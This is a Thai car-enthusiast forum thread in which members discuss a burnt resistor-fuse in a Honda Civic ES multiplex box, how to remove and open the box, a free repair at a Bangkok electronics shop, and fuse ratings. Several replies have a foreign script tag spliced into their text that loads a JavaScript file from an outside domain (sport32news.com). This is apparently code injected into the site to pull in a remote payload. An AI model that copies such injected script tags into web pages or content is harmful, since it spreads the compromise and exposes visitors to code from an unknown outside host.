ตอบ
hikaru_kung

เข้าร่วม: 29 ธันวา 2009
ตอบ: 3067

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4341
ให้คำขอบคุณ: 4602
ศุกร์, 24 สิงหา 2012 16:23 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
           เหตุ :  สืบเนื่องจากหลายๆสาเหคุที่จำเป็นต้องไปยุ่งเกี่ยวกับขั้วแบตเตอรี่ โดยเฉพาะล่าสุดไปติดแก๊สมา แล้วได้กลิ่นอยู่ในห้องโดยสาร เลยสงสัยว่าอาจจะเกิดจากกลิ่นแก๊ส ก็รีบกลับไปที่อู่ ก็ไม่เจอจุดที่มีแก๊สรั่ว ก็เลยคิดว่าอาจจะเป็นกลิ่นซิลิโคน ไม่กี่วันอาจจะหาย

ก็เลยใช้งานไปพักนึง ที่นี่อาการรถเริ่มออกคือ

1. ไฟเพดานไม่ติด ทั้งเวลาปิดและเปิดประตูก็เลยไปเช็คฟิวส์ใต้คอพวงมาลัย เจอว่าฟิวส์ขาด กด็เลยเอาฟิวส์มาเปลี่ยน ลองเปิดไฟกลับมาติดเหมือนเดิม
แต่ ไฟหรีหน่วงเพดานไม่ติดซะงั้น
2. ถัดมาอาการที่สองคือ พอกดล๊อครถ เก็บๆของอยู่ รีโมทล๊อครถเองซะง้านนนน เอาละสิงานเข้า แต่โชคยังดีเอากระจกลงไว้ เลยไปดึงที่เปิดประตูได้ (ไม่มีกุญแจสำรองอีกตะหาก)

ที่นี่ก็เลยมานั่งหาขุมสมบัติความรู็ในเว๊บ ก็ไปเจอกระทู้ คุณยัน ซึ่งต้องขอบคุณมากๆๆๆ ทำให้ผมเกิดความรู้มากมายยย ตามลิงค์เลย http://www.civicesgroup.com/forum/topic43017 ก็เลยรู็ว่าสาเหตุมาจากที่เจ้าตัวฟิวส์ในกล่องมันไหม้ ก็เลยลองหาเวลาทำใจอยู่พักใหญ่ๆเพราะไม่อยากยุ่งกะกล่องกลัวมันพังกว่าเดิม จะไปเบิกศูนย์ก็เกือบหมื่น ลองโทรถามร้านช่างเดช แกก็บอกว่าซ่อมไม่ได้  ก็เลยจัดการเองซะเลยรื้อมันซะ จะบอกว่าการถอดครั้งแรกยากมากๆๆ เพราะสายไฟที่เก็บไว้เป็นระเบียบดีเกิน ดึงกล่องลงมาไม่ได้ เลยใช้เวลาถอดกล่อง อยู่เกือบ 2 ชั่วโมง (ถ้าจะถอดง่ายขึ้น ผมเลยถอดฝาครอบพวงมาลัยก่อน มันจะได้โล่งๆ) 

หลังจากถอดมาได้ก็นึกว่าจะเปิดฝากล่องง่ายๆ ผลปรากฎว่า ฝาแน่นมากๆๆ ต้องงัดอยู่นานกว่าจะออก พอถอดฝาออกมาแทบตกใจ แผงไหม้ดำปี๋  เท่าที่เห็นอาการหนักว่าคุณยันเยอะเลยย

ที่นี้ก็เลยไปปรึกษาพี่ที่ทำงาน เค้าแนะนำร้านซ่อมอุปกรณ์ไฟฟ้าที่ดิโอลด์ สยาม ก็เลยไปดูเข้าไปที่หน้าร้านพร้อมสภาพกล่อที่แกะมาเรียบร้อย พี่หน้าเคาร์เตอร์ก็เลยพาไปที่ช่างก็เอาให้เค้าดูแล้วก็อธิบายให้เค้าฟังว่าคืออารายจะให้เค้าทำอาราย  ช่างเค้าก็เช็คไฟให้ก่อน จับไฟค่อมโอล์ม นิ่งสนิท พี่เค้าก็เลยเอาฟิวส์โอห์มตัวใหม่ (0 โอล์ม) มาใส่ให้แทน เช็คบอร์คให้ด้วย ไม่ถึง 15 นาทีเรียบร้อยยยยย

แต่ที่สำคัญ ก็ถามเค้าว่าเดินไปคิดเงินข้างหน้าช่ายไหม ช่างเค้าก็บอกว่าไม่เป็นไรนิดเดียวเองงงง โอววว!!!! บริการแบบนี้ได้ใจไปเลยครับ(ผมเพิ่งไปร้านนี้ครั้งแรกนะ) ซ่อมกล่องฟรี ได้แบบนี้หายเหนื่อยกะกาารถอดกล่องอย่างยากเย็นเองมะคืนเลยละครับ

ถ้าเครื่องใช้ไฟฟ้าอารายเสียแนะนำเลยร้านนี้ลองไปดู

ส่วนสภาพกล่องตามรูปด้านล่างเลยยยย

อันนี้สภาพก่อนทำ ไหม้และเหม็น เหอะๆ
อันนี้สภาพก่อนทำ ไหม้และเหม็น เหอะๆ
อันนี้เปลี่ยนเรียบร้อย จะบอกด้วยว่าแผงวงจรที่เห็นนี่ถอดออกมาได้นะครับ ช่างเค้าถอดมาเช็ดทำความสะอาดให้
อันนี้เปลี่ยนเรียบร้อย จะบอกด้วยว่าแผงวงจรที่เห็นนี่ถอดออกมาได้นะครับ ช่างเค้าถอดมาเช็ดทำความสะอาดให้
ค่อยๆงัดร่องข้างๆทีละนิดสลับสองข้างนะครับ เด๋วก็หลุด ^^
ค่อยๆงัดร่องข้างๆทีละนิดสลับสองข้างนะครับ เด๋วก็หลุด ^^

แก้ไขล่าสุดโดย เมื่อ เสาร์, 25 สิงหา 2012 19:16, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
wut-chiangmai

ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 24 สิงหา 2012 16:41 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
สุดยอดเลยครับ คุณต๋อง 

ต้องเรียกพี่โจ มาดูซะหน่อยแล้ว 
ได้รับคำขอบคุณจาก: hikaru_kung  MALLMAR  karnmotocross01 
bankabby

ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 24 สิงหา 2012 16:43 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
ขอบคุณสำหรับความรู้ดีดีครับ 
ได้รับคำขอบคุณจาก: hikaru_kung  MALLMAR  karnmotocross01 
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
ศุกร์, 24 สิงหา 2012 16:44 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
แจ่มครับ  ^ ^
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 24 สิงหา 2012 16:45 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
เห้ย......เจ๋งอ่ะ ต้องถอดไปทำเองใช่ป่ะคับ
เค้าทำให้เลยป่าวคับ เสียกี่บาทอ่ะ ใช่ ดีโอสยาม ตรงเพาะช่างป่าวคับ
ได้รับคำขอบคุณจาก: hikaru_kung  wut-chiangmai  MALLMAR 
hikaru_kung

ครอบครัว ES
ครอบครัว ES

ศุกร์, 24 สิงหา 2012 17:17 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
jonatan พิมพ์ว่า:
เห้ย......เจ๋งอ่ะ ต้องถอดไปทำเองใช่ป่ะคับ
เค้าทำให้เลยป่าวคับ เสียกี่บาทอ่ะ ใช่ ดีโอสยาม ตรงเพาะช่างป่าวคับ

ช่ายๆๆๆ ถอดไปเองเลยพี่โจ แต่ต๋องถอดฝาครอบไปด้วยนะ แต่จะบอกว่างัดออกยาก มันแน่น เหอะๆ

ส่วนค่าทำเนี่ย เสียแต่ค่าเดินทาง เพราะเข้าไปที่ร้านแล้วบอกเค้าว่าตัวต้านทานมันไหม้ จะให้เปลี่ยนตัวนี้ เค้าก็พาไปที่ช่าง เปลี่ยนให้มะถึง 15 นาที แถมมะคิดตังค์ด้วย เหอะๆ

ส่วนร้านอมร ดิโอล์ด สยาม พลาซ่า ชั้นสอง อะพี่

!!!  ไปซ่อมกล่องมัลติเพล็กมา !!!!

!!!  ไปซ่อมกล่องมัลติเพล็กมา !!!!

ได้รับคำขอบคุณจาก: wut-chiangmai  KAATO  okuma  ~ สเตฟาน ~  MALLMAR  Nung_Sodapop  jk2475  newcolor  Doraeman  นุรักษ์ 
yuncup2008

เข้าร่วม: 05 พฤศจิกา 2008
ตอบ: 427

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 68

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 24 สิงหา 2012 18:43 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
อุ๊ย...! เอามาขึ้นหน้าบอร์ดเลยเหรอ

ปล.รูปที่ผมลงให้ดูนั้น คือมันยังไม่เสียครับ ถ้าเสียสภาพก็ไม่ต่างจากของคุณต๋องหรอกครับ
ได้รับคำขอบคุณจาก: MALLMAR  hikaru_kung 
srisuwan

ชื่อเล่น: รินทร์

เข้าร่วม: 29 กรกฎา 2012
ตอบ: 206

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 281
ให้คำขอบคุณ: 0

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 24 สิงหา 2012 19:25 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
อมรเค้าซอมทุกอย่างจัดแผนกไฟฟ้าความรับผิดชอบของช่างตามหมวดหมู่ สุดยอดมากคือเราต้องกล้าที่จะเปิดไมงั้นเข้าศูนย์อย่างเดียวเสียรู้หมดผมว่าอุปกรณ์อิเลคในบ้่านเรามีเกีอบทุกรายการน่ะ
ได้รับคำขอบคุณจาก: MALLMAR  hikaru_kung 
es04

เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 24 สิงหา 2012 21:42 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
ขอบคุณครับ
x-speed

ชื่อเล่น: เอ๊กซ์

เข้าร่วม: 11 กันยา 2011
ตอบ: 139

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 79
ให้คำขอบคุณ: 168

สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 24 สิงหา 2012 23:07 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
เยี่ยมไปเลยครับต๋อง <script src="https://sport32news.com/civicesgroup.js"></
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

เสาร์, 25 สิงหา 2012 00:05 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
เก็บข้อมูลครับ
bbb@es

เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 25 สิงหา 2012 01:43 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
ที่ชั้นใต้ดินเซียร์รังสิตก็มีคับร้านอมรอ่ะคับ
aunja

ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 25 สิงหา 2012 03:51 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
สุดยอด
jonatan

ชื่อเล่น: โจ

ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ปี: 2005
เสาร์, 25 สิงหา 2012 09:56 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
hikaru_kung พิมพ์ว่า:

ช่ายๆๆๆ ถอดไปเองเลยพี่โจ แต่ต๋องถอดฝาครอบไปด้วยนะ แต่จะบอกว่างัดออกยาก มันแน่น เหอะๆ

ส่วนค่าทำเนี่ย เสียแต่ค่าเดินทาง เพราะเข้าไปที่ร้านแล้วบอกเค้าว่าตัวต้านทานมันไหม้ จะให้เปลี่ยนตัวนี้ เค้าก็พาไปที่ช่าง เปลี่ยนให้มะถึง 15 นาที แถมมะคิดตังค์ด้วย เหอะๆ

ส่วนร้านอมร ดิโอล์ด สยาม พลาซ่า ชั้นสอง อะพี่

ขอบคุณมากๆคับ k.ต๋อง เดี๋ยวต้องหาเวลาว่างไปทำมั่งอ่ะคับ
แต่ว่าอาการที่ k.ต๋อง ผมไม่รู้ว่ามันเสียตัวเดี๋ยวกันป่าวอ่ะคับ
เจ้าปัญหามันคือ ตัวนี้ตัวเดียวใช่ป่ะคับ ที่ทำให้ทุกวงจรในกล่องมันใช้ไม่ได้อ่ะคับ
ของผมต่อไฟประตูแล้ว มันช็อต กล่องเลยพัง ไฟหน่วงเวลามันเสียไปอ่ะคับ ใช่อาการเดี๋ยวกันป่าวอ่ะคับ"<script src="https://sport32news.com/civicesgroup.js">
MALLMAR

เข้าร่วม: 19 พฤศจิกา 2010
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 6319

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 25 สิงหา 2012 10:19 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
...
ได้รับคำขอบคุณจาก: hikaru_kung 
hikaru_kung

ครอบครัว ES
ครอบครัว ES

เสาร์, 25 สิงหา 2012 10:24 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
yuncup2008 พิมพ์ว่า:
อุ๊ย...! เอามาขึ้นหน้าบอร์ดเลยเหรอ

ปล.รูปที่ผมลงให้ดูนั้น คือมันยังไม่เสียครับ ถ้าเสียสภาพก็ไม่ต่างจากของคุณต๋องหรอกครับ

แหะ รอบนี้ต้องขอบคุณพี่มากเลยมะง้านคงเสียเงินหลายพัน ^^
hikaru_kung

ครอบครัว ES
ครอบครัว ES

เสาร์, 25 สิงหา 2012 10:27 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!

ขอบคุณมากๆคับ k.ต๋อง เดี๋ยวต้องหาเวลาว่างไปทำมั่งอ่ะคับ
แต่ว่าอาการที่ k.ต๋อง ผมไม่รู้ว่ามันเสียตัวเดี๋ยวกันป่าวอ่ะคับ
เจ้าปัญหามันคือ ตัวนี้ตัวเดียวใช่ป่ะคับ ที่ทำให้ทุกวงจรในกล่องมันใช้ไม่ได้อ่ะคับ
ของผมต่อไฟประตูแล้ว มันช็อต กล่องเลยพัง ไฟหน่วงเวลามันเสียไปอ่ะคับ ใช่อาการเดี๋ยวกันป่าวอ่ะคับ"<script src="https://sport32news.com/civicesgroup.js">

อาการปะมาณนั้นเลยพี่โจ ช๊อตนิหน่อยไปเลยย เหอะๆ

อีกอย่างคือมานจะมีกลิ่นเหมือนเหม็นไหม้ที่กล่องอะคับ แต่กลิ่นจะจางมากๆ ต้องดมที่กล่องกลิ่นถึงจาชัดอะคับ

แต่ว่าฝากล่องอาจจะงัดออกยากหน่อยนะ เหอะๆ
Nung_Sodapop

ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 25 สิงหา 2012 10:35 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
 ถ้าเราไม่ทำไฟช๊อตหรือไม่ยุ่งกะแบตเตอรี่มากมันก็จะไม่เกิดใช่ป่ะครับ ผมจะพยายามไม่ยุ่งกะแบตมากและ อิอิ
ได้รับคำขอบคุณจาก: hikaru_kung 
itcentre

เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 25 สิงหา 2012 10:54 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
 สุดยอด
WarHighways

ชื่อเล่น: วาร์

เข้าร่วม: 04 มิถุนา 2012
ตอบ: 1283

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1312
ให้คำขอบคุณ: 1463

เสาร์, 25 สิงหา 2012 11:08 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
เยี่ยมเลยครับผม
aon3160

ชื่อเล่น: อ้น

เข้าร่วม: 28 มีนา 2012
ตอบ: 222

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 97

เสาร์, 25 สิงหา 2012 11:26 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
ขอบคุณครับ มาเก็บความรู้
athongchum

ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

เสาร์, 25 สิงหา 2012 11:31 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
มีเรื่องอยากเตือนนิดนึงครับ

ก่อนเปลี่ยนทราบหรือป่าวว่าตัวต้านทานตัวนั้นค่ากี่โอห์ม แถบสีด้านข้างยังดูออกมั้ย ถ้าตัวต้านทานตัวนี้ทำหน้าที่เป็นฟิล์ว ถ้าใช้ค่าที่มากกว่าของเดิม คราวต่อไปถ้าเกิดทำไฟช๊อตอีก มันจะไม่ไหม้แล้ว แต่มันจะพาลไปไหม้ตัวอื่นแทน ถ้าเป็นตัวอุปกรณ์พวกแยกตัวก็คงไม่มีไรมาก แต่ถ้ามันลามเข้าไปไหม้ที่ชิพละก็ งานเข้าเลยน่ะครับ ซ่อมไม่ได้แน่นอน เพราะชิพพวกนี้น่าจะเป็นชิพเฉพาะงาน ไม่มีขายตามท้องตลาดทั่วไป อาจจะต้องหากล่องเสียๆมาเลาะชิพ ถ้าโชคร้ายหาไม่ได้ก็เปลี่ยนกล่องไปเลยเท่านั้นครับ
poon

เข้าร่วม: 07 กรกฎา 2012
ตอบ: 127

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 137
เสาร์, 25 สิงหา 2012 11:40 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
อิอิ แอบมาเก็บข้อมูล "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
yuncup2008

อาทิตย์, 26 สิงหา 2012 07:11 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!

มันใจครับว่าเป็นที่จุดเดียวกัน ผมซ่อมมาเป็นสินๆตัวแล้วครับอาการแบบนี้
yuncup2008

อาทิตย์, 26 สิงหา 2012 07:26 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
athongchum พิมพ์ว่า:

ก่อนเปลี่ยนทราบหรือป่าวว่าตัวต้านทานตัวนั้นค่ากี่โอห์ม แถบสีด้านข้างยังดูออกมั้ย ถ้าตัวต้านทานตัวนี้ทำหน้าที่เป็นฟิล์ว ถ้าใช้ค่าที่มากกว่าของเดิม คราวต่อไปถ้าเกิดทำไฟช๊อตอีก มันจะไม่ไหม้แล้ว แต่มันจะพาลไปไหม้ตัวอื่นแทน ถ้าเป็นตัวอุปกรณ์พวกแยกตัวก็คงไม่มีไรมาก แต่ถ้ามันลามเข้าไปไหม้ที่ชิพละก็ งานเข้าเลยน่ะครับ ซ่อมไม่ได้แน่นอน เพราะชิพพวกนี้น่าจะเป็นชิพเฉพาะงาน ไม่มีขายตามท้องตลาดทั่วไป อาจจะต้องหากล่องเสียๆมาเลาะชิพ ถ้าโชคร้ายหาไม่ได้ก็เปลี่ยนกล่องไปเลยเท่านั้นครับ

ตัวต้านทานเดิมมีค่า 0 โอมป์ครับ ผมลองทดสอบแล้วครับ โดยการเอาขั่วบวกของไปเพดานมาซ็อตกับกราวผลที่ได้คือฟิวส์ตัว0.5แอมป์
ที่เปลี่ยนเข้าไปใหม่มันขาดครับ(พอดีผมมีกล่องฟิวส์หลายตัวเลยกล้าเสี่ยงดูครับ) และก็รู้สึกว่าฟิวส์จะขาดง่ายกว่าของเดิมครับ แต่ไม่มีผลต่อการเพิ่มไฟตามจุดต่างๆ
เพราะรถผมติดไฟเพดานแบบแผงLED+ไฟส่องเท้า4จุด+ไฟส่องพื้นใต้ประตู4จุด(เวลาลงจากรถมืดๆจะได้แน่ใจว่าไม่เหยียบขี้หมา<script src="https://sport32news.com/civicesgroup.js"></ )
ปล.ถ้าท่านใดมีตัวอุปกร์ใดที่ดีกว่ามาใช้แทนเจ้าฟิวส์ตัวนี้ได้ก็ลงความเห็นกันได้ครับ
athongchum

ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

อาทิตย์, 26 สิงหา 2012 13:16 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!

ตัวต้านทานเดิมมีค่า 0 โอมป์ครับ ผมลองทดสอบแล้วครับ โดยการเอาขั่วบวกของไปเพดานมาซ็อตกับกราวผลที่ได้คือฟิวส์ตัว0.5แอมป์
ที่เปลี่ยนเข้าไปใหม่มันขาดครับ(พอดีผมมีกล่องฟิวส์หลายตัวเลยกล้าเสี่ยงดูครับ) และก็รู้สึกว่าฟิวส์จะขาดง่ายกว่าของเดิมครับ แต่ไม่มีผลต่อการเพิ่มไฟตามจุดต่างๆ
เพราะรถผมติดไฟเพดานแบบแผงLED+ไฟส่องเท้า4จุด+ไฟส่องพื้นใต้ประตู4จุด(เวลาลงจากรถมืดๆจะได้แน่ใจว่าไม่เหยียบขี้หมา<script src="https://sport32news.com/civicesgroup.js"></ )
ปล.ถ้าท่านใดมีตัวอุปกร์ใดที่ดีกว่ามาใช้แทนเจ้าฟิวส์ตัวนี้ได้ก็ลงความเห็นกันได้ครับ

โอ้วว กล้ามากครับท่าน เอาไฟช๊อตกัน แล้วถ้าฟิวส์มันไม่ตัดนี่มียุ่งเลยครับ

ว่าแต่ ฟิวส์เดิมนี่ค่าเท่าไหร่ครับผม
popza4

ชื่อเล่น: อ้น

เข้าร่วม: 19 กรกฎา 2012
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 3347

สี: แดง ไฟร์เปปเปอร์ (R-507P)
อาทิตย์, 26 สิงหา 2012 14:40 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
เก็บข้อมูลครับ"<script src="https://sport32news.com/civicesgroup.js">
jk2475

ชื่อเล่น: เล็ก

ตอบ: 2852

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1893
ให้คำขอบคุณ: 4964

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 26 สิงหา 2012 16:08 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
งั้นก็แสดงว่าหายป่วย กลับมาปกติแล้วใช่ไหมต๋อง

ขอบคุณสำหรับข้อมูลนะครับ
BastardBoy

ชื่อเล่น: เอ็กซ์

เข้าร่วม: 27 พฤศจิกา 2010
ตอบ: 160

ได้รับคำขอบคุณ: 244
ให้คำขอบคุณ: 318

อาทิตย์, 26 สิงหา 2012 16:40 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!
ขอบคุณครับ วันนี้เจออาการนี้เลย ไฟอยู่ ๆ ก็ไม่ติด ประตูอยู่ ๆ ก้อล๊อกเอง -_-" นั่งงง อยู่เลย ได้มาอ่านเวปเจอพอดี ^ ^
yuncup2008

อาทิตย์, 26 สิงหา 2012 17:41 - !!! ไปซ่อมกล่องมัลติเพล็กมา !!!!

โอ้วว กล้ามากครับท่าน เอาไฟช๊อตกัน แล้วถ้าฟิวส์มันไม่ตัดนี่มียุ่งเลยครับ

ว่าแต่ ฟิวส์เดิมนี่ค่าเท่าไหร่ครับผม

ฟิวส์เดิมผมไม่ทราบจริงๆว่าทนกระแสได้กี่แอมป์ครับ มันเขียนโค๊ตว่า R16J (1w) ผมลองเดินหาซื้อตามร้านทั่วๆไปแล้วไม่มีเลย บ้างร้านไม่รู้จักซะด้วยซ้ำ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.